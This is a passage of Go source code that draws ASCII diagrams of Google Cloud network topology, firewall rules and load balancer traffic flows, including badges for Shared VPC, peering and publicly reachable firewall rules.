	PrivateIPGoogleAccess bool
	// FlowLogsEnabled is rendered as the Logs:Y/N flag.
	FlowLogsEnabled bool
}

// CloudNATInfo represents Cloud NAT for diagram purposes.
type CloudNATInfo struct {
	Name    string
	Region  string
	Network string
	// NATIPAddresses empty means auto-allocated IPs (rendered as "AUTO").
	NATIPAddresses []string
}

// FirewallRuleInfo represents a firewall rule for diagram purposes.
type FirewallRuleInfo struct {
	Name      string
	Direction string
	// Priority: lower number = evaluated first (GCP semantics, see legend).
	Priority     int64
	SourceRanges []string
	AllowedPorts string
	TargetTags   string
	// IsPublicIngress marks rules reachable from 0.0.0.0/0 (rendered ⚠).
	IsPublicIngress bool
	Disabled        bool
}

// LoadBalancerInfo represents a load balancer for diagram purposes.
type LoadBalancerInfo struct {
	Name            string
	Type            string
	Scheme          string
	IPAddress       string
	Port            string
	Region          string
	BackendServices []string
	// SecurityPolicy non-empty means a Cloud Armor policy is attached.
	SecurityPolicy string
	// BackendDetails maps backend service name to its actual backends (instance groups, NEGs, etc.)
	BackendDetails map[string][]string
}

// VPCPeeringInfo represents VPC peering for diagram purposes.
type VPCPeeringInfo struct {
	Name          string
	Network       string
	PeerNetwork   string
	PeerProjectID string
	// State as reported by the API; renderers substitute "ACTIVE" when empty.
	State        string
	ExportRoutes bool
	ImportRoutes bool
}

// SharedVPCConfig represents shared VPC configuration.
type SharedVPCConfig struct {
	HostProject     string
	ServiceProjects []string
	Networks        []string
}

// ========================================
// Network Topology Diagram Functions
// ========================================

// DrawNetworkTopologyDiagram generates a complete network topology ASCII diagram:
// a header box, one project box per entry in networksByProject (sorted by
// project ID for deterministic output), optional Shared VPC and peering
// summaries, and a legend. Output width is fixed at 90 columns.
func DrawNetworkTopologyDiagram(
	networksByProject map[string][]NetworkInfo,
	subnetsByNetwork map[string][]SubnetInfo, // key: "projectID/networkName"
	natsByNetwork map[string][]CloudNATInfo, // key: "projectID/networkName"
	peeringMap map[string][]VPCPeeringInfo, // key: "projectID/networkName"
	sharedVPCs map[string]SharedVPCConfig, // key: hostProjectID
	projectNames map[string]string, // projectID -> displayName
) string {
	var sb strings.Builder
	width := 90

	// Header
	sb.WriteString(DrawBox("GCP NETWORK TOPOLOGY", width))
	sb.WriteString("\n")

	// Sort projects for consistent output (map iteration order is random)
	var projectIDs []string
	for projectID := range networksByProject {
		projectIDs = append(projectIDs, projectID)
	}
	sort.Strings(projectIDs)

	// Draw each project
	for _, projectID := range projectIDs {
		networks := networksByProject[projectID]
		displayName := projectNames[projectID]
		sb.WriteString(drawProjectNetworks(projectID, displayName, networks, subnetsByNetwork, natsByNetwork, peeringMap, width))
		sb.WriteString("\n")
	}

	// Draw Shared VPC relationships if any
	if len(sharedVPCs) > 0 {
		sb.WriteString(drawSharedVPCRelationships(sharedVPCs, width))
		sb.WriteString("\n")
	}

	// Draw VPC Peering summary
	allPeerings := collectAllPeerings(peeringMap)
	if len(allPeerings) > 0 {
		sb.WriteString(drawPeeringSummary(allPeerings, width))
		sb.WriteString("\n")
	}

	// Legend
	sb.WriteString(DrawNetworkLegend(width))

	return sb.String()
}

// drawProjectNetworks renders one project's box: a header showing the project
// ID (plus display name when it differs), then each of its VPC networks,
// sorted by name.
func drawProjectNetworks(
	projectID, displayName string,
	networks []NetworkInfo,
	subnetsByNetwork map[string][]SubnetInfo,
	natsByNetwork map[string][]CloudNATInfo,
	peeringMap map[string][]VPCPeeringInfo,
	width int,
) string {
	var sb strings.Builder

	projectTitle := fmt.Sprintf("PROJECT: %s", projectID)
	if displayName != "" && displayName != projectID {
		projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, displayName)
	}

	// Project header
	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	// Sort networks for deterministic output
	sort.Slice(networks, func(i, j int) bool {
		return networks[i].Name < networks[j].Name
	})

	// Draw each VPC network
	for _, network := range networks {
		sb.WriteString(drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width))
	}

	// Project footer
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// drawVPCNetwork renders a single VPC as a nested box inside the project box:
// a title line with routing mode / MTU / shared-VPC / peering badges, then a
// grid of per-region subnet boxes (3 per row), then an optional Cloud NAT box.
// All emitted lines are wrapped in the project box's "│ ... │" walls.
func drawVPCNetwork(
	network NetworkInfo,
	subnetsByNetwork map[string][]SubnetInfo,
	natsByNetwork map[string][]CloudNATInfo,
	peeringMap map[string][]VPCPeeringInfo,
	outerWidth int,
) string {
	var sb strings.Builder
	innerWidth := outerWidth - 6

	// VPC header with attributes
	vpcTitle := fmt.Sprintf("VPC: %s", network.Name)
	vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU)

	// Add Shared VPC indicator
	sharedVPCLabel := ""
	if network.IsSharedVPC {
		sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole))
	}

	// Peering indicator
	peeringLabel := ""
	if network.PeeringCount > 0 {
		peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount)
	}

	sb.WriteString(DrawEmptyLine(outerWidth))
	sb.WriteString("│ ┌")
	sb.WriteString(strings.Repeat("─", innerWidth-2))
	sb.WriteString("┐ │\n")

	// VPC title line
	titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel)
	if len(titleLine) > innerWidth-4 {
		titleLine = titleLine[:innerWidth-7] + "..."
	}
	sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine))

	sb.WriteString("│ ├")
	sb.WriteString(strings.Repeat("─", innerWidth-2))
	sb.WriteString("┤ │\n")

	// Get subnets for this network (same "projectID/networkName" key scheme
	// the caller uses to build the map)
	key := network.ProjectID + "/" + network.Name
	subnets := subnetsByNetwork[key]

	// Group subnets by region
	subnetsByRegion := make(map[string][]SubnetInfo)
	for _, s := range subnets {
		subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s)
	}

	// Sort regions for deterministic output
	var regions []string
	for region := range subnetsByRegion {
		regions = append(regions, region)
	}
	sort.Strings(regions)

	if len(subnets) == 0 {
		sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)"))
	} else {
		// Draw subnets in a grid layout (3 per row)
		subnetWidth := 26
		subnetsPerRow := 3

		for i := 0; i < len(regions); i += subnetsPerRow {
			endIdx := i + subnetsPerRow
			if endIdx > len(regions) {
				endIdx = len(regions)
			}
			rowRegions := regions[i:endIdx]

			// Top of subnet boxes
			sb.WriteString("│ │ ")
			for j := range rowRegions {
				if j > 0 {
					sb.WriteString(" ")
				}
				sb.WriteString("┌")
				sb.WriteString(strings.Repeat("─", subnetWidth-2))
				sb.WriteString("┐")
			}
			// remaining = filler so the row reaches the inner box's right
			// wall; reused by every subsequent line of this row.
			remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - ((len(rowRegions) - 1) * 2)
			sb.WriteString(strings.Repeat(" ", remaining))
			sb.WriteString(" │ │\n")

			// Region name line
			sb.WriteString("│ │ ")
			for j, region := range rowRegions {
				if j > 0 {
					sb.WriteString(" ")
				}
				regionDisplay := region
				if len(regionDisplay) > subnetWidth-4 {
					regionDisplay = regionDisplay[:subnetWidth-7] + "..."
				}
				sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay))
			}
			sb.WriteString(strings.Repeat(" ", remaining))
			sb.WriteString(" │ │\n")

			// Separator
			sb.WriteString("│ │ ")
			for j := range rowRegions {
				if j > 0 {
					sb.WriteString(" ")
				}
				sb.WriteString("├")
				sb.WriteString(strings.Repeat("─", subnetWidth-2))
				sb.WriteString("┤")
			}
			sb.WriteString(strings.Repeat(" ", remaining))
			sb.WriteString(" │ │\n")

			// Subnet details for each region: rows are padded to the tallest
			// column so every box in the row closes at the same height.
			maxSubnets := 0
			for _, region := range rowRegions {
				if len(subnetsByRegion[region]) > maxSubnets {
					maxSubnets = len(subnetsByRegion[region])
				}
			}

			for subnetIdx := 0; subnetIdx < maxSubnets; subnetIdx++ {
				// Subnet name
				sb.WriteString("│ │ ")
				for j, region := range rowRegions {
					if j > 0 {
						sb.WriteString(" ")
					}
					regionSubnets := subnetsByRegion[region]
					if subnetIdx < len(regionSubnets) {
						s := regionSubnets[subnetIdx]
						name := s.Name
						if len(name) > subnetWidth-4 {
							name = name[:subnetWidth-7] + "..."
						}
						sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name))
					} else {
						// This region's column has fewer subnets than the
						// tallest in the row: emit an empty cell as filler.
						sb.WriteString("│")
						sb.WriteString(strings.Repeat(" ", subnetWidth-2))
						sb.WriteString("│")
					}
				}
				sb.WriteString(strings.Repeat(" ", remaining))
				sb.WriteString(" │ │\n")

				// CIDR
				sb.WriteString("│ │ ")
				for j, region := range rowRegions {
					if j > 0 {
						sb.WriteString(" ")
					}
					regionSubnets := subnetsByRegion[region]
					if subnetIdx < len(regionSubnets) {
						s := regionSubnets[subnetIdx]
						sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange))
					} else {
						sb.WriteString("│")
						sb.WriteString(strings.Repeat(" ", subnetWidth-2))
						sb.WriteString("│")
					}
				}
				sb.WriteString(strings.Repeat(" ", remaining))
				sb.WriteString(" │ │\n")

				// Flags (PGA, Logs) — see DrawNetworkLegend for meanings
				sb.WriteString("│ │ ")
				for j, region := range rowRegions {
					if j > 0 {
						sb.WriteString(" ")
					}
					regionSubnets := subnetsByRegion[region]
					if subnetIdx < len(regionSubnets) {
						s := regionSubnets[subnetIdx]
						pga := "PGA:N"
						if s.PrivateIPGoogleAccess {
							pga = "PGA:Y"
						}
						logs := "Logs:N"
						if s.FlowLogsEnabled {
							logs = "Logs:Y"
						}
						flags := fmt.Sprintf("[%s][%s]", pga, logs)
						sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags))
					} else {
						sb.WriteString("│")
						sb.WriteString(strings.Repeat(" ", subnetWidth-2))
						sb.WriteString("│")
					}
				}
				sb.WriteString(strings.Repeat(" ", remaining))
				sb.WriteString(" │ │\n")
			}

			// Bottom of subnet boxes
			sb.WriteString("│ │ ")
			for j := range rowRegions {
				if j > 0 {
					sb.WriteString(" ")
				}
				sb.WriteString("└")
				sb.WriteString(strings.Repeat("─", subnetWidth-2))
				sb.WriteString("┘")
			}
			sb.WriteString(strings.Repeat(" ", remaining))
			sb.WriteString(" │ │\n")
		}
	}

	// Check for Cloud NAT
	// NOTE(review): this NAT sub-box uses fixed-width literal strings, so it
	// only lines up for the hard-coded width=90 used by the topology diagram
	// — confirm no caller passes a different outerWidth.
	nats := natsByNetwork[key]
	if len(nats) > 0 {
		sb.WriteString("│ │ │ │\n")
		sb.WriteString("│ │ ┌────────────────────────┐ │ │\n")
		for _, nat := range nats {
			// Empty NATIPAddresses means auto-allocated external IPs.
			natIPs := "AUTO"
			if len(nat.NATIPAddresses) > 0 {
				natIPs = strings.Join(nat.NATIPAddresses, ",")
				if len(natIPs) > 18 {
					natIPs = natIPs[:15] + "..."
				}
			}
			natName := nat.Name
			if len(natName) > 11 {
				natName = natName[:11]
			}
			natRegion := nat.Region
			if len(natRegion) > 13 {
				natRegion = natRegion[:13]
			}
			sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", natName))
			sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", natRegion))
			sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs))
		}
		sb.WriteString("│ │ └───────────┬────────────┘ │ │\n")
		sb.WriteString("│ │ │ │ │\n")
		sb.WriteString("│ │ ▼ │ │\n")
		sb.WriteString("│ │ [INTERNET] │ │\n")
	}

	// VPC footer
	sb.WriteString("│ │ │ │\n")
	sb.WriteString("│ └")
	sb.WriteString(strings.Repeat("─", innerWidth-2))
	sb.WriteString("┘ │\n")

	return sb.String()
}

// drawSharedVPCRelationships renders a box per Shared VPC host project with
// arrows fanning out to up to 6 service-project boxes (the remainder is
// summarized as "(+N more)").
func drawSharedVPCRelationships(sharedVPCs map[string]SharedVPCConfig, width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	for hostProject, config := range sharedVPCs {
		sb.WriteString(DrawEmptyLine(width))
		sb.WriteString("│ ┌─────────────────────────────┐ │\n")
		sb.WriteString("│ │ HOST PROJECT │ │\n")

		hostDisplay := hostProject
		if len(hostDisplay) > 27 {
			hostDisplay = hostDisplay[:24] + "..."
		}
		sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay))
		sb.WriteString("│ └──────────────┬──────────────┘ │\n")
		sb.WriteString("│ │ │\n")

		if len(config.ServiceProjects) > 0 {
			// Fan out to at most 6 service-project boxes per host.
			numProjects := len(config.ServiceProjects)
			if numProjects > 6 {
				numProjects = 6
			}

			// Connector row: one ┌/┬ stub per rendered service project.
			sb.WriteString("│ ")
			for i := 0; i < numProjects; i++ {
				if i == 0 {
					sb.WriteString("┌")
				} else {
					sb.WriteString("┬")
				}
				sb.WriteString("────────────")
			}
			if len(config.ServiceProjects) > 6 {
				sb.WriteString("┬────────────")
			}
			sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14)))
			sb.WriteString("│\n")

			// Arrow row
			sb.WriteString("│ ")
			for i := 0; i < numProjects; i++ {
				sb.WriteString("▼ ")
			}
			if len(config.ServiceProjects) > 6 {
				sb.WriteString(" ")
			}
			sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14)))
			sb.WriteString("│\n")

			// Top of service-project boxes
			sb.WriteString("│ ")
			for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ {
				sb.WriteString("┌──────────┐ ")
			}
			if len(config.ServiceProjects) > 6 {
				sb.WriteString(" ... ")
			}
			sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12)))
			sb.WriteString("│\n")

			// Project-name row (names over 10 chars shortened to 7 + "...")
			sb.WriteString("│ ")
			for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ {
				proj := config.ServiceProjects[i]
				if len(proj) > 10 {
					proj = proj[:7] + "..."
				}
				sb.WriteString(fmt.Sprintf("│%-10s│ ", proj))
			}
			if len(config.ServiceProjects) > 6 {
				sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6))
			}
			sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12)))
			sb.WriteString("│\n")

			// Bottom of service-project boxes
			sb.WriteString("│ ")
			for i := 0; i < numProjects; i++ {
				sb.WriteString("└──────────┘ ")
			}
			// NOTE(review): the "-12+12" here cancels out and differs from the
			// "-12" used on the two rows above; looks like a leftover
			// adjustment — verify right-wall alignment when >6 projects.
			sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12+12)))
			sb.WriteString("│\n")
		}
	}

	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// collectAllPeerings flattens the per-network peering map into a single slice.
func collectAllPeerings(peeringMap map[string][]VPCPeeringInfo) []VPCPeeringInfo {
	var all []VPCPeeringInfo
	for _, peerings := range peeringMap {
		all = append(all, peerings...)
	}
	return all
}

// drawPeeringSummary renders one "<──────>" line per peering connection, with
// state and route import/export badges.
func drawPeeringSummary(peerings []VPCPeeringInfo, width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	for _, peering := range peerings {
		// Draw peering connection (self-link URLs reduced to bare names)
		networkName := extractNetworkNameFromURL(peering.Network)
		peerNetworkName := extractNetworkNameFromURL(peering.PeerNetwork)

		// An empty state from the API is displayed as ACTIVE.
		state := peering.State
		if state == "" {
			state = "ACTIVE"
		}

		routeInfo := ""
		if peering.ExportRoutes && peering.ImportRoutes {
			routeInfo = "[export+import routes]"
		} else if peering.ExportRoutes {
			routeInfo = "[export routes]"
		} else if peering.ImportRoutes {
			routeInfo = "[import routes]"
		}

		line := fmt.Sprintf(" %s <──────> %s (%s) %s", networkName, peerNetworkName, state, routeInfo)
		if len(line) > width-4 {
			line = line[:width-7] + "..."
		}
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line))
	}

	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// DrawNetworkLegend draws a legend for network topology diagrams explaining
// the PGA/Logs flags and the shared-VPC / peering badges used above.
func DrawNetworkLegend(width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA:Y/N = Private Google Access enabled/disabled"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs:Y/N = VPC Flow Logs enabled/disabled"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC HOST] = Project hosts shared VPC networks"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC SERVICE] = Project uses shared VPC networks"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[n PEERING(s)] = Number of VPC peering connections"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "<──────> = VPC peering connection"))
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// ========================================
// Firewall Diagram Functions
// ========================================

// DrawFirewallDiagram generates an ASCII diagram showing firewall rules for
// one network: a title box, separate INGRESS/EGRESS sections (each sorted by
// priority), a traffic-flow visualization, and a legend.
func DrawFirewallDiagram(
	rules []FirewallRuleInfo,
	networkName string,
	projectID string,
	width int,
) string {
	var sb strings.Builder

	title := fmt.Sprintf("FIREWALL RULES: %s", networkName)
	if projectID != "" {
		title = fmt.Sprintf("FIREWALL RULES: %s (Project: %s)", networkName, projectID)
	}

	sb.WriteString(DrawBox(title, width))
	sb.WriteString("\n")

	// Separate ingress and egress (anything not INGRESS is treated as egress)
	var ingressRules, egressRules []FirewallRuleInfo
	for _, rule := range rules {
		if strings.ToUpper(rule.Direction) == "INGRESS" {
			ingressRules = append(ingressRules, rule)
		} else {
			egressRules = append(egressRules, rule)
		}
	}

	// Draw ingress section
	if len(ingressRules) > 0 {
		sb.WriteString(drawFirewallSection("INGRESS (Inbound Traffic)", ingressRules, width))
		sb.WriteString("\n")
	}

	// Draw egress section
	if len(egressRules) > 0 {
		sb.WriteString(drawFirewallSection("EGRESS (Outbound Traffic)", egressRules, width))
		sb.WriteString("\n")
	}

	// Draw traffic flow visualization
	sb.WriteString(drawTrafficFlowDiagram(ingressRules, egressRules, width))

	// Legend
	sb.WriteString(DrawFirewallLegend(width))

	return sb.String()
}

// drawFirewallSection renders one direction's rules, sorted ascending by
// priority (lower number = evaluated first), two lines per rule plus a blank
// spacer. Public-ingress rules get a ⚠ prefix.
func drawFirewallSection(title string, rules []FirewallRuleInfo, width int) string {
	var sb strings.Builder

	// Sort by priority
	sort.Slice(rules, func(i, j int) bool {
		return rules[i].Priority < rules[j].Priority
	})

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	for _, rule := range rules {
		// Risk indicator
		riskIndicator := " "
		if rule.IsPublicIngress {
			riskIndicator = "⚠ "
		}

		// Disabled indicator
		disabledLabel := ""
		if rule.Disabled {
			disabledLabel = " [DISABLED]"
		}

		// Format source ranges ("*" when none were reported)
		sources := strings.Join(rule.SourceRanges, ", ")
		if len(sources) > 30 {
			sources = sources[:27] + "..."
		}
		if sources == "" {
			sources = "*"
		}

		// Format targets (empty tags = rule applies to all instances)
		targets := rule.TargetTags
		if targets == "" {
			targets = "ALL"
		}

		// Rule name line
		nameLine := fmt.Sprintf("%s%s (Priority: %d)%s", riskIndicator, rule.Name, rule.Priority, disabledLabel)
		if len(nameLine) > width-4 {
			nameLine = nameLine[:width-7] + "..."
		}
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, nameLine))

		// Details line
		detailLine := fmt.Sprintf(" Sources: %s → Ports: %s → Targets: %s", sources, rule.AllowedPorts, targets)
		if len(detailLine) > width-4 {
			detailLine = detailLine[:width-7] + "..."
		}
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, detailLine))
		sb.WriteString(DrawEmptyLine(width))
	}

	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// drawTrafficFlowDiagram renders the simplified INTERNET -> FIREWALL -> VPC
// flow picture plus rule counts, with a warning line when any ingress rule is
// open to 0.0.0.0/0.
func drawTrafficFlowDiagram(ingressRules, egressRules []FirewallRuleInfo, width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "TRAFFIC FLOW VISUALIZATION"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	// Count public ingress
	publicIngress := 0
	for _, r := range ingressRules {
		if r.IsPublicIngress {
			publicIngress++
		}
	}

	// Draw simplified flow
	sb.WriteString("│ │\n")
	sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n")
	sb.WriteString("│ │ INTERNET │ ─────> │ FIREWALL RULES │ ─────> │ VPC/VMs │ │\n")
	sb.WriteString("│ │ (External) │ │ │ │ (Internal) │ │\n")
	sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n")
	sb.WriteString("│ │\n")

	// Summary stats
	statsLine := fmt.Sprintf(" Ingress Rules: %d (Public: %d) Egress Rules: %d", len(ingressRules), publicIngress, len(egressRules))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine))

	if publicIngress > 0 {
		warningLine := " ⚠ WARNING: Public ingress rules allow traffic from 0.0.0.0/0"
		sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine))
	}

	sb.WriteString("│ │\n")
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// DrawFirewallLegend draws the firewall diagram legend
func DrawFirewallLegend(width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND"))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "⚠ = Public ingress rule (0.0.0.0/0 source)"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Priority = Lower number = higher priority (evaluated first)"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[DISABLED] = Rule is not active"))
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Targets: ALL = Rule applies to all instances in network"))
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// ========================================
// Load Balancer Diagram Functions
// ========================================

// DrawLoadBalancerDiagram generates an ASCII diagram showing load balancer
// traffic flow, split into EXTERNAL and INTERNAL sections, followed by
// summary statistics and a legend.
func DrawLoadBalancerDiagram(
	loadBalancers []LoadBalancerInfo,
	projectID string,
	width int,
) string {
	var sb strings.Builder

	title := "LOAD BALANCER TRAFFIC FLOW"
	if projectID != "" {
		title = fmt.Sprintf("LOAD BALANCER TRAFFIC FLOW (Project: %s)", projectID)
	}

	sb.WriteString(DrawBox(title, width))
	sb.WriteString("\n")

	// Separate external and internal (any non-EXTERNAL scheme counts as internal)
	var externalLBs, internalLBs []LoadBalancerInfo
	for _, lb := range loadBalancers {
		if strings.ToUpper(lb.Scheme) == "EXTERNAL" {
			externalLBs = append(externalLBs, lb)
		} else {
			internalLBs = append(internalLBs, lb)
		}
	}

	// Draw external load balancers with flow
	if len(externalLBs) > 0 {
		sb.WriteString(drawLBFlowSection("EXTERNAL (Internet-facing)", externalLBs, width))
		sb.WriteString("\n")
	}

	// Draw internal load balancers with flow
	if len(internalLBs) > 0 {
		sb.WriteString(drawLBFlowSection("INTERNAL (VPC-only)", internalLBs, width))
		sb.WriteString("\n")
	}

	// Summary stats
	sb.WriteString(drawLBSummary(externalLBs, internalLBs, width))

	// Legend
	sb.WriteString(DrawLoadBalancerLegend(width))

	return sb.String()
}

// drawLBFlowSection draws individual load balancer flows showing frontend -> backend,
// one drawSingleLBFlow per LB with a horizontal rule between consecutive LBs.
func drawLBFlowSection(title string, lbs []LoadBalancerInfo, width int) string {
	var sb strings.Builder

	sb.WriteString("┌")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┐\n")
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title))
	sb.WriteString("├")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┤\n")

	for i, lb := range lbs {
		// Draw flow for each load balancer
		sb.WriteString(drawSingleLBFlow(lb, width))

		// Add separator between LBs (but not after the last one)
		if i < len(lbs)-1 {
			sb.WriteString("│")
			sb.WriteString(strings.Repeat("─", width-2))
			sb.WriteString("│\n")
		}
	}

	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// drawSingleLBFlow draws a single load balancer's traffic flow: a header line
// (name, type, region, optional Cloud Armor badge), then a FRONTEND box
// (IP:port) connected by an arrow to a BACKEND box listing each backend
// service and, when BackendDetails has them, its individual targets.
func drawSingleLBFlow(lb LoadBalancerInfo, width int) string {
	var sb strings.Builder

	// Security indicator
	armorLabel := ""
	if lb.SecurityPolicy != "" {
		armorLabel = " [Cloud Armor: " + lb.SecurityPolicy + "]"
	}

	// LB name and type header
	headerLine := fmt.Sprintf(" %s (%s, %s)%s", lb.Name, lb.Type, lb.Region, armorLabel)
	if len(headerLine) > width-4 {
		headerLine = headerLine[:width-7] + "..."
	}
	sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, headerLine))
	sb.WriteString(DrawEmptyLine(width))

	// Frontend (IP:Port)
	frontendBox := fmt.Sprintf("%s:%s", lb.IPAddress, lb.Port)

	// Build backend lines with actual backend targets
	var backendLines []string
	if len(lb.BackendServices) == 0 {
		backendLines = []string{"(no backends)"}
	} else {
		for _, beSvc := range lb.BackendServices {
			// Check if we have detailed backend info
			if lb.BackendDetails != nil {
				if targets, ok := lb.BackendDetails[beSvc]; ok && len(targets) > 0 {
					// Show backend service with its targets
					backendLines = append(backendLines, fmt.Sprintf("%s:", beSvc))
					for _, target := range targets {
						backendLines = append(backendLines, fmt.Sprintf(" -> %s", target))
					}
				} else {
					backendLines = append(backendLines, beSvc)
				}
			} else {
				backendLines = append(backendLines, beSvc)
			}
		}
	}

	// Calculate dynamic backend width based on longest line
	backendWidth := 35
	for _, line := range backendLines {
		if len(line)+4 > backendWidth {
			backendWidth = len(line) + 4
		}
	}
	// Cap at reasonable max
	maxBackendWidth := width - 35
	if backendWidth > maxBackendWidth {
		backendWidth = maxBackendWidth
	}

	frontendWidth := 23
	arrowWidth := 7
	padding := width - frontendWidth - backendWidth - arrowWidth - 8
	if padding < 0 {
		padding = 0
	}

	// Top of boxes
	sb.WriteString(fmt.Sprintf("│ ┌%s┐ ┌%s┐%s│\n",
		strings.Repeat("─", frontendWidth),
		strings.Repeat("─", backendWidth),
		strings.Repeat(" ", padding)))

	// Frontend label
	sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n",
		frontendWidth-2, "FRONTEND",
		backendWidth-2, "BACKEND SERVICE -> TARGETS",
		strings.Repeat(" ", padding)))

	// Separator with arrow
	sb.WriteString(fmt.Sprintf("│ ├%s┤ ───> ├%s┤%s│\n",
		strings.Repeat("─", frontendWidth),
		strings.Repeat("─", backendWidth),
		strings.Repeat(" ", padding)))

	// IP:Port line with first backend
	sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n",
		frontendWidth-2, frontendBox,
		backendWidth-2, safeGetIndex(backendLines, 0),
		strings.Repeat(" ", padding)))

	// Additional backend lines (frontend column left blank after first row)
	for i := 1; i < len(backendLines); i++ {
		sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n",
			frontendWidth-2, "",
			backendWidth-2, backendLines[i],
